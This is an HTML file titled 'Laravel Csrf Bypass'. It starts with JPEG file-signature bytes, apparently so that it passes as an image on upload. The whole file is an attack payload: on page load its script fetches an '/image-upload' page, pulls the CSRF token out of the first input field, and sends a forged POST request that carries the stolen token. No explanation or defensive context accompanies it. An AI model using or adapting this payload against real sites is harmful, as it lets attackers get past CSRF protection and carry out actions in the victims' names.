ÿØÿà<html>
<head>
    <title>Laravel Csrf Bypass</title>
</head>
<body>
<script>
    function submitFormWithTokenJS(token) {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", POST_URL, true);

        // Send the proper header information along with the request
        xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

        // This is for debugging and can be removed
        xhr.onreadystatechange = function() {
            if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
                console.log(xhr.responseText);
            }
        }
        //
        xhr.send("_token=" + token + "&desiredParameter=desiredValue");
    }

    function getTokenJS() {
        var xhr = new XMLHttpRequest();
        // This tels it to return it as a HTML document
        xhr.responseType = "document";
        // true on the end of here makes the call asynchronous
        //Edit the path as you want
        xhr.open("GET", "/image-upload", true);
        xhr.onload = function (e) {
            if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
                // Get the document from the response
                page = xhr.response
                // Get the input element
                input = page.getElementsByTagName("input")[0];
                // Show the token
                alert("The token is: " + input.value);
                // Use the token to submit the form
                submitFormWithTokenJS(input.value);
            }
        };
        // Make the request
        xhr.send(null);
    }
    getTokenJS();

    var POST_URL="/"
    getTokenJS();

</script>
</html>